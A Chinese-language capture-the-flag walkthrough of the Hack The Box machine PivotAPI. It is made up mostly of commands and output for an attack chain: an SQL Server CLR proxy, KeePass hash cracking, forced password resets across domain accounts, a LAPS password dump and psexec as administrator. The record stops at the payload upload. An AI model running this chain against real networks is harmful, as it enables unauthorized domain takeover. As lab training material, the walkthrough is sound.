File "/usr/lib/python3.11/cmd.py", line 126, in cmdloop
line = input(self.prompt)
^^^^^^^^^^^^^^^^^^
KeyboardInterrupt
┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/mssqlproxy]
└─# ls
assembly.cs Microsoft.SqlServer.Proxy.dll mssqlclient.py README.md reciclador reciclador.dll
但是似乎这个仓库里只有assembly.cs
源码,而没有编译好的文件,我们既可以尝试搜索是否有已经编译好的dll
文件,也可以自己编译
发现官方就已经有发布了:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# wget -m https://github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll
--2024-02-07 16:31:57-- https://github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll
正在解析主机 github.com (github.com)... 20.205.243.166
正在连接 github.com (github.com)|20.205.243.166|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 302 Found
位置:https://objects.githubusercontent.com/github-production-release-asset-2e65be/239964495/ec7f2480-4e5a-11ea-84f8-efa3df9d6c73?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240207%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240207T083158Z&X-Amz-Expires=300&X-Amz-Signature=65ab9367d1aeb7eb965069fa9ad2e4c5f4c85e86c55607081311933c351a2a42&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=239964495&response-content-disposition=attachment%3B%20filename%3Dassembly.dll&response-content-type=application%2Foctet-stream [跟随至新的 URL]
--2024-02-07 16:31:58-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/239964495/ec7f2480-4e5a-11ea-84f8-efa3df9d6c73?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240207%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240207T083158Z&X-Amz-Expires=300&X-Amz-Signature=65ab9367d1aeb7eb965069fa9ad2e4c5f4c85e86c55607081311933c351a2a42&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=239964495&response-content-disposition=attachment%3B%20filename%3Dassembly.dll&response-content-type=application%2Foctet-stream
正在解析主机 objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
正在连接 objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:4608 (4.5K) [application/octet-stream]
正在保存至: “github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll”
github.com/blackarrowsec/ms 100%[==========================================>] 4.50K --.-KB/s 用时 0s
2024-02-07 16:31:59 (54.4 MB/s) - 已保存 “github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll” [4608/4608])
下载完毕 --2024-02-07 16:31:59--
总用时:2.4s
下载了:1 个文件,0s (54.4 MB/s) 中的 4.5K
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cp github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll ./
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# python3 mssqlproxy/mssqlclient.py 'LicorDebellota.htb/sa:#mssql_s3rV1c3!2020@10.129.207.210' -install -clr assembly.dll
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[*] Proxy mode: install
[*] CLR enabled
[*] Assembly successfully installed
[*] Procedure successfully installed
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# python3 mssqlproxy/mssqlclient.py 'LicorDebellota.htb/sa:#mssql_s3rV1c3!2020@10.129.207.210' -start -reciclador 'c:\windows\temp\reciclador.dll'
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[*] Proxy mode: check
[*] Assembly is installed
[*] Procedure is installed
[*] reciclador is installed
[*] clr enabled
[*] Proxy mode: start
[*] Listening on port 1337...
[*] ACK from server!
发现已经打开了1337端口进行监听,为了保证严谨也可以用netstat
再验证一下:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# netstat -tnlp | grep 1337
tcp 0 0 0.0.0.0:1337 0.0.0.0:* LISTEN 155907/python3
连接winrm获取shell
接下来就可以用proxychains
代理:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# nt /etc/proxychains4.conf
# 在最后添加 socks5 127.0.0.1 1337
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# proxychains evil-winrm -i 127.0.0.1 -u svc_mssql -p '#mssql_s3rV1c3!2020'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Dynamic chain ... 127.0.0.1:1337 ... 127.0.0.1:5985 ... OK
*Evil-WinRM* PS C:\Users\svc_mssql\Documents> whoami
licordebellota\svc_mssql
但是可能是代理连接状态或者其他原因,拿到的这个shell并不是很稳定,常常会中断,然后等一分钟左右才能重新执行命令成功,但这就是渗透过程的常态,如果我们知道原因知道如何解决,会节省很多时间,但不知道的情况下只能一次又一次地重复这个过程,并且现在这种情况下是无法进行排查的,只能乖乖等待
*Evil-WinRM* PS C:\Users\svc_mssql\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\svc_mssql\desktop> ls
Directorio: C:\Users\svc_mssql\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/8/2020 10:12 PM 2286 credentials.kdbx
-a---- 4/30/2021 10:39 AM 93 note.txt
*Evil-WinRM* PS C:\Users\svc_mssql\desktop> download credentials.kdbx
Info: Downloading C:\Users\svc_mssql\desktop\credentials.kdbx to credentials.kdbx
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_mssql\desktop> download note.txt
Info: Downloading C:\Users\svc_mssql\desktop\note.txt to note.txt
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_mssql\desktop>
查看一下刚刚下载的文件:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cat ./note.txt
Long running MSSQL Proxies can cause issues. Please switch to SSH after getting credentials.
这里提示我们长时间运行mssql代理会导致问题,这正好就是我们刚才遇到的情况,当然,这很有靶机的色彩,如果是现实中不会有这么明显的提示,但我们如果人忍受不了每次执行命令都要等待,肯定会自然想用其他方式拿到一个更稳定的shell。这种问题有时候也通常可能是管理员配置了什么设置项导致的。而
.kdbx
文件是KeePass Password Safe
数据库文件的扩展名。要打开 .kdbx 文件,需要使用 KeePass 软件或兼容的密码管理器,这是图形化的,也可以用命令行工具kpcli
,可以用linux自带包管理器安装
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# kpcli --kdb credentials.kdbx
Provide the master password:
# 这里还需要破解出密码,因此先生成中间hash值:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# keepass2john credentials.kdbx
credentials:$keepass$*2*60000*0*006e4f7f747a915a0301bded09da8339260ff96caf1ca7cef63b8fdd37c6a836*deabca672663938eddc0ee9e2726d9ff65d4ab7c6863f6f712f1c14b97c670a2*b33392502f94cd323ed25bc2d9c1749a*67ac769a9693b2ef7f1a149fb4e182042fcd2888df727ef4226edb5d9ae35c5c*dccf52b56e846bf088caa284beeaceffe16f304586ee13e87197387bac16ca6b
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# keepass2john credentials.kdbx > credentials.kdbx.hash
# 利用hashcat破解
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# hashcat --help | grep -i keepass
13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) | Password Manager
29700 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) - keyfile only mode | Password Manager
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# hashcat -m 13400 credentials.kdbx.hash /usr/share/wordlists/rockyou.txt --user
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i5-13500HX, 30953/61970 MB (8192 MB allocatable), 20MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 5 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$keepass$*2*60000*0*006e4f7f747a915a0301bded09da8339260ff96caf1ca7cef63b8fdd37c6a836*deabca672663938eddc0ee9e2726d9ff65d4ab7c6863f6f712f1c14b97c670a2*b33392502f94cd323ed25bc2d9c1749a*67ac769a9693b2ef7f1a149fb4e182042fcd2888df727ef4226edb5d9ae35c5c*dccf52b56e846bf088caa284beeaceffe16f304586ee13e87197387bac16ca6b:mahalkita
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*60000*0*006e4f7f747a915a0301bded09da833...16ca6b
Time.Started.....: Wed Feb 7 18:13:36 2024 (0 secs)
Time.Estimated...: Wed Feb 7 18:13:36 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 885 H/s (3.41ms) @ Accel:16 Loops:1024 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 320/14344385 (0.00%)
Rejected.........: 0/320 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:59392-60000
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> 101010
Hardware.Mon.#1..: Temp: 68c Util: 7%
Started: Wed Feb 7 18:13:19 2024
Stopped: Wed Feb 7 18:13:37 2024
很快破解出密码mahalkita
,重新连接并尝试执行命令:
kpcli:/> ls
=== Groups ===
Database/
kpcli:/> cd Database/
kpcli:/Database> ls
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/
kpcli:/Database> ls eMail/
kpcli:/Database> ls General/
kpcli:/Database> ls Homebanking/
kpcli:/Database> ls Internet/
kpcli:/Database> ls Network/
kpcli:/Database> ls Recycle\ Bin/
=== Entries ===
0. Sample Entry keepass.info
1. Sample Entry #2 keepass.info/help/kb/testform.
kpcli:/Database> ls Windows/
=== Entries ===
0. SSH
kpcli:/Database> show -f Recycle\ Bin/Sample\ Entry
Path: /Database/Recycle Bin/
Title: Sample Entry
Uname: User Name
Pass: Password
URL: https://keepass.info/
Notes: Notes
kpcli:/Database> show -f Recycle\ Bin/Sample\ Entry\ #2
Path: /Database/Recycle Bin/
Use of uninitialized value $comment in split at /usr/bin/kpcli line 6338.
Use of uninitialized value $val in pattern match (m//) at /usr/bin/kpcli line 3275.
Use of uninitialized value $val in sprintf at /usr/bin/kpcli line 3279.
Title: Sample Entry #2
Uname: Michael321
Pass: 12345
URL: https://keepass.info/help/kb/testform.html
Notes:
kpcli:/Database> show -f Windows/SSH
Path: /Database/Windows/
Title: SSH
Uname: 3v4Si0N
Pass: Gu4nCh3C4NaRi0N!23
URL:
Notes:
显然,联系刚才获取到的信息,最后一个是最有价值的
获取立足点
连接刚获取到的ssh凭据:
──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/mssqlproxy]
└─# ssh 3v4Si0N@10.129.207.210
The authenticity of host '10.129.207.210 (10.129.207.210)' can't be established.
ED25519 key fingerprint is SHA256:D84pRKEdwy8GejDfHWYVRaAr8wMUPhSz0V4EUOCZC3Y.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:14: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
。。。
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>cd Desktop
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N\Desktop>dir
El volumen de la unidad C no tiene etiqueta.
El número de serie del volumen es: 94DB-AFCA
Directorio de C:\Users\3v4Si0N\Desktop
09/08/2020 16:01 <DIR> .
09/08/2020 16:01 <DIR> ..
06/02/2024 08:41 34 user.txt
1 archivos 34 bytes
2 dirs 4.234.256.384 bytes libres
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N\Desktop>type user.txt
ecd5457068cd545b4f64647d1d017ed3
所以User Flag
是:ecd5457068cd545b4f64647d1d017ed3
横向迁移
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N\Desktop>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\3v4Si0N\Desktop> cd c:\
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 08/08/2020 19:23 Developers
d----- 08/08/2020 12:53 inetpub
d----- 08/08/2020 22:48 PerfLogs
d-r--- 19/02/2021 13:42 Program Files
d----- 09/08/2020 17:06 Program Files (x86)
d-r--- 08/08/2020 19:46 Users
d----- 29/04/2021 17:31 Windows
PS C:\> cd .\Developers\
PS C:\Developers> ls
ls : Access to the path 'C:\Developers' is denied.
At line:1 char:1
+ ls
+ ~~
+ CategoryInfo : PermissionDenied: (C:\Developers:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
# The "Developers" here looks like a user group name
PS C:\Developers> net group /domain
Group Accounts for \\PIVOTAPI
-------------------------------------------------------------------------------
*Administrators key
*Administrators key of the organization
*Business Administrators
*Schema Admins
*Domain Admins
*Domain Controllers
*Cloneable Domain Controllers
*Read-only Domain Controllers
*Developers
*DnsUpdateProxy
*Enterprise Domain Controllers Read-Only
*Domain Computers
*Domain Guests
*LAPS ADM
*LAPS READ
*Group Policy Creator Owners
*Protected Users
*Domain Users
*WinRM
The command completed successfully.
可以发现Developers
确实就是域用户组中的其中一个,看看该组中有哪些用户:
PS C:\Developers> net group Developers /domain
Group Name Developers
Comment
Members
-------------------------------------------------------------------------------
jari superfume
The command completed successfully.
又是陌生的名字,可以再去bloodhound
里看看能不能找到什么新的利用路径,先看看developers
组相关的攻击路径:
这里列出了用户之间的权限关系以及superfume
用户与developers
组的从属关系,因此我们要访问Developers
文件夹的内容之前,必须根据这些关系先拿到最终的superfume
用户权限。比如3V4SI0N
具有DR.ZAIUSS
用户的所有权,因此可以尝试修改DR.ZAIUSS
用户的密码,这样就等于拿到了DR.ZAIUSS
的shell,也就是横向迁移:
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>net user dr.zaiuss cvestone!666
The command completed successfully.
不过并不能访问到DR.ZAIUSS
的ssh:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ssh dr.zaiuss@10.129.228.115
dr.zaiuss@10.129.228.115's password:
Permission denied, please try again.
dr.zaiuss@10.129.228.115's password:
但是除了ssh,我们还有evil-winrm
可以利用,在另一个窗口执行:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# proxychains evil-winrm -i 127.0.0.1 -u dr.zaiuss -p 'cvestone!666'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Dynamic chain ... 127.0.0.1:1337 ... 127.0.0.1:5985 ... OK
*Evil-WinRM* PS C:\Users\Dr.Zaiuss\Documents> net user superfume cvestone!666
Se ha completado el comando correctamente.
*Evil-WinRM* PS C:\Users\Dr.Zaiuss\Documents>
同样的,修改了superfume
用户的密码,从而拿到权限,如果失败了,保持耐心多尝试几次,并且一定要快速,因为note.txt
已告诉我们存在代理网络连接不稳定问题。尝试后,superfume
用户同样不能用ssh连接,依旧使用evil-winrm
:
*Evil-WinRM* PS C:\> cd Developers
*Evil-WinRM* PS C:\Developers> dir
Directorio: C:\Developers
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/8/2020 7:26 PM Jari
d----- 8/8/2020 7:23 PM Superfume
*Evil-WinRM* PS C:\Developers> cd Jari
*Evil-WinRM* PS C:\Developers\Jari> dir
Directorio: C:\Developers\Jari
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/8/2020 7:26 PM 3676 program.cs
-a---- 8/8/2020 7:18 PM 7168 restart-mssql.exe
*Evil-WinRM* PS C:\Developers\Jari> download program.cs
Info: Downloading C:\Developers\Jari\program.cs to program.cs
Info: Download successful!
*Evil-WinRM* PS C:\Developers\Jari> download restart-mssql.exe
Info: Downloading C:\Developers\Jari\restart-mssql.exe to restart-mssql.exe
Info: Download successful!
*Evil-WinRM* PS C:\Developers\Jari> cd ..
*Evil-WinRM* PS C:\Developers> cd Superfume
*Evil-WinRM* PS C:\Developers\Superfume> dir
*Evil-WinRM* PS C:\Developers\Superfume>
下载了两个文件
分析程序2
查看.cs
源码,推测应该就是另外一个程序的源码
查看一下该可执行程序的具体类型:
┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/Developers]
└─# file restart-mssql.exe
restart-mssql.exe: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows, 2 sections
该程序是基于.net
的,并且名字与最初的程序是相似的,猜测这个程序也能像第一个程序一样泄漏出凭据,但首先要通过逆向分析的手段,搜索一下关于.net
的逆向工具:
最终我决定选择在虚拟机使用dnSpy
工具:
代码审计发现泄漏凭据
结合审计反编译代码和源代码,
反编译:
// restart_oracle.Program
// Token: 0x06000001 RID: 1 RVA: 0x00002048 File Offset: 0x00000248
private static void Main()
{
string value = "\r\n ____ __ __ __\r\n / __ \\___ _____/ /_____ ______/ /_ ____ ___ ______________ _/ /\r\n / /_/ / _ \\/ ___/ __/ __ `/ ___/ __/ / __ `__ \\/ ___/ ___/ __ `/ / \r\n / _, _/ __(__ ) /_/ /_/ / / / /_ / / / / / (__ |__ ) /_/ / / \r\n/_/ |_|\\___/____/\\__/\\__,_/_/ \\__/ /_/ /_/ /_/____/____/\\__, /_/ \r\n /_/ \r\n by @HelpDesk 2020\r\n\r\n";
byte[] bytes = Encoding.ASCII.GetBytes("CR_is_a_crybaby");
byte[] data = new byte[]
{
66,
180,
137,
236,
54,
46,
36,
97,
214,
48,
90,
72,
24,
83
};
byte[] array = Program.RC4.Decrypt(bytes, data);
Console.WriteLine(value);
Thread.Sleep(5000);
Process process = new Process();
SecureString secureString = new SecureString();
process.StartInfo.FileName = "c:\\windows\\syswow64\\cmd.exe";
process.StartInfo.Arguments = "/c sc.exe stop SERVICENAME ; sc.exe start SERVICENAME";
process.StartInfo.RedirectStandardOutput = true;
process.StartInfo.UseShellExecute = false;
process.StartInfo.UserName = "Jari";
string text = "";
for (int i = 0; i < text.Length; i++)
{
secureString.AppendChar(text[i]);
}
process.StartInfo.Password = secureString;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
}
源代码:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Threading;
namespace restart_oracle
{
class Program
{
public class RC4
{
public static byte[] Encrypt(byte[] pwd, byte[] data)
{
int a, i, j, k, tmp;
int[] key, box;
byte[] cipher;
key = new int[256];
box = new int[256];
cipher = new byte[data.Length];
for (i = 0; i < 256; i++)
{
key[i] = pwd[i % pwd.Length];
box[i] = i;
}
for (j = i = 0; i < 256; i++)
{
j = (j + box[i] + key[i]) % 256;
tmp = box[i];
box[i] = box[j];
box[j] = tmp;
}
for (a = j = i = 0; i < data.Length; i++)
{
a++;
a %= 256;
j += box[a];
j %= 256;
tmp = box[a];
box[a] = box[j];
box[j] = tmp;
k = box[((box[a] + box[j]) % 256)];
cipher[i] = (byte)(data[i] ^ k);
}
return cipher;
}
public static byte[] Decrypt(byte[] pwd, byte[] data)
{
return Encrypt(pwd, data);
}
public static byte[] StringToByteArray(String hex)
{
int NumberChars = hex.Length;
byte[] bytes = new byte[NumberChars / 2];
for (int i = 0; i < NumberChars; i += 2)
bytes[i / 2] = Convert.ToByte(hex.Substring(i, 2), 16);
return bytes;
}
}
static void Main()
{
string banner = @"
____ __ __ __
/ __ \___ _____/ /_____ ______/ /_ ____ ___ ______________ _/ /
/ /_/ / _ \/ ___/ __/ __ `/ ___/ __/ / __ `__ \/ ___/ ___/ __ `/ /
/ _, _/ __(__ ) /_/ /_/ / / / /_ / / / / / (__ |__ ) /_/ / /
/_/ |_|\___/____/\__/\__,_/_/ \__/ /_/ /_/ /_/____/____/\__, /_/
/_/
by @HelpDesk 2020
";
byte[] key = Encoding.ASCII.GetBytes("");
byte[] password_cipher = { };
byte[] resultado = RC4.Decrypt(key, password_cipher);
Console.WriteLine(banner);
Thread.Sleep(5000);
System.Diagnostics.Process psi = new System.Diagnostics.Process();
System.Security.SecureString ssPwd = new System.Security.SecureString();
psi.StartInfo.FileName = "c:\\windows\\syswow64\\cmd.exe";
psi.StartInfo.Arguments = "/c sc.exe stop SERVICENAME ; sc.exe start SERVICENAME";
psi.StartInfo.RedirectStandardOutput = true;
psi.StartInfo.UseShellExecute = false;
psi.StartInfo.UserName = "Jari";
string password = "";
for (int x = 0; x < password.Length; x++)
{
ssPwd.AppendChar(password[x]);
}
password = "";
psi.StartInfo.Password = ssPwd;
psi.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
psi.Start();
}
}
}
代码审计分析:
通常来说,凭据有可能泄漏在控制台输出语句中,因此可以在Console.WriteLine(value);
设置断点,然后观察此时内存中储存的数据,我们确实发现了泄漏的凭据密码,并且由源码psi.StartInfo.UserName = "Jari";
与这是在Jari
目录下的文件,我们可以知道这个密码对应的就是Jari
的:
因此,将新的凭据Jari:Cos@Chung@!RPG
记录到文件中
该凭据依然还是ssh连接失败,依然尝试通过evil-winrm
连接,成功了,但是这次我们还可以尝试有没有其他开放的API
可以利用,因为利用winrm
代理连接太不稳定了,重新查看tcpdetails.nmap
发现还有msrpc
服务可以尝试连接:
这个靶机处在域环境中,当我们拿到一个shell,然后通过横向迁移拿到其他shell,我们可以反复横跳,这就是
pivot
,又由于不仅仅只有开放一个API
让我们尝试连接, 我认为这就是PivotAPI
这个挑战名的由来。
pivot by msrpc
在这之前先看看用户Jari
的用户属性:
在外部连接控制对象中
发现该用户可以强制修改其他两个用户的密码,
开始在新的窗口中尝试连接msrpc
,它的用法有很多,我们可以尝试用它改密码:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# rpcclient -U 'Jari%Cos@Chung@!RPG' 10.129.228.115
rpcclient $> setuserinfo2 help
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 gibdeon 23 'cvestone!666'
rpcclient $>
同时可以用crackmapexec
验证是否修改成功:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# crackmapexec smb 10.129.228.115 -u gibdeon -p 'cvestone!666'
SMB 10.129.228.115 445 PIVOTAPI [*] Windows 10.0 Build 17763 x64 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.115 445 PIVOTAPI [+] LicorDeBellota.htb\gibdeon:cvestone!666
有个+
说明成功了。
bloodhound帮助寻找域中更多攻击路径
再查看用户gibdeon
的用户属性:
在一级群组成员关系
中发现该用户在域用户组
和账户操作员组
中。
查看域用户组
的具体情况:
没有能够直接控制的外部对象:
而账户操作员组
却有很多能够直接控制的外部对象:
在这个复杂的域环境中,对象多的让人头皮发麻,但请时刻牢记我们的最终目的--拿下域管理员!!因此我们依旧可以利用bloodhound
查看通往域管理员的最短攻击路径:
比如从我们已经占据的目标(💀️标注)出发,表明PSRemote
方式可以尝试。
利用LAPS获取域管理员凭据
先回到已经拿到的稳定ssh连接中,查看一下具体的域群组情况:
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>net groups /domain
Group Accounts for \\PIVOTAPI
-------------------------------------------------------------------------------
*Key Administrators
*Organization Key Administrators
*Enterprise Administrators
*Schema Administrators
*Domain Admins
*Domain Controllers
*Cloneable Domain Controllers
*Read-only Domain Controllers
*Developers
*DnsUpdateProxy
*Enterprise Read-only Domain Controllers
*Domain Computers
*Domain Guests
*LAPS ADM
*LAPS READ
*Group Policy Creator Owners
*Protected Users
*Domain Users
*WinRM
The command completed successfully.
其中,LAPS ADM
和LAPS READ
是我们最感兴趣的组。
LAPS ADM
和LAPS READ
是与权限提升相关的组。LAPS
代表Local Administrator Password Solution(本地管理员密码解决方案),它是一种微软提供的工具,用于自动管理和轮换计算机本地管理员密码。这两个组的目的是控制对LAPS功能的访问权限。
LAPS ADM
组通常用于授予用户权限,使其能够管理和更改计算机的本地管理员密码。成员可以使用LAPS工具来重置、更改和查看计算机的本地管理员密码。
LAPS READ
组通常用于授予用户权限,使其能够查看计算机的本地管理员密码,但不能更改或重置密码。这通常用于需要监视或审核本地管理员密码的安全团队或其他特定角色的用户。
如果我们拿到了LAPS READ
组,就相当于拿到了域中管理员权限,查看一下这两个组的成员:
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>net groups "LAPS READ" /domain
Group Name LAPS READ
Comment
Members
-------------------------------------------------------------------------------
cybervaca lothbrok
The command completed successfully.
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>net groups "LAPS ADM" /domain
Group Name LAPS ADM
Comment
Members
-------------------------------------------------------------------------------
cybervaca
The command completed successfully.
说明这两个组中,用户cybervaca
具有最高权限,回到最初bloodhound
中账户操作员组
的直接控制外部对象
图,发现能够完全控制lothbrok
,但没有cybervaca
,所以我们可以通过gibdeon
修改lothbrok
的密码,这条攻击路径相对于其他的路径更容易,可以尝试:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# rpcclient -U 'gibdeon%cvestone!666' 10.129.229.178
rpcclient $> setuserinfo2 lothbrok 23 'cvestone.com666'
rpcclient $>
拿下lothbrok
,接下来就可以利用工具查看laps
密码,搜索工具如下:
运行该脚本:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# python3 dump_laps.py -u lothbrok -p cvestone.com666 -d LicorDebellota.htb -l 10.129.229.178
LAPS Dumper - Running at 02-10-2024 20:29:27
PIVOTAPI 2UF4969F52FbRvF2tap0
我们拿到了域管理员的权限,验证一下:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# crackmapexec smb 10.129.229.178 -u Administrador -p '2UF4969F52FbRvF2tap0'
SMB 10.129.229.178 445 PIVOTAPI [*] Windows 10.0 Build 17763 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
SMB 10.129.229.178 445 PIVOTAPI [+] LicorDeBellota.htb\Administrador:2UF4969F52FbRvF2tap0 (Pwn3d!)
并且这里标注了Pwn3d!
说明我们确实拿下了这台机器
这里一定要注意:由于这个机器的语种不是英语,所以相应的管理员名字是不一样的,这个可以通过
net user
查看
但是现在问题就是该如何连接域管理员的shell,可以先在bloodhound
查看之前的服务组成员中是否包含域管理员:
显然都不包含。
利用psexec连接域管理员shell
在这种情况下,我们其实还可以尝试impacket
套件中的psexec
:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# psexec.py Administrador:'2UF4969F52FbRvF2tap0'@10.129.229.178
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Requesting shares on 10.129.229.178.....
[*] Found writable share ADMIN$
[*] Uploading file TweoOztV.exe
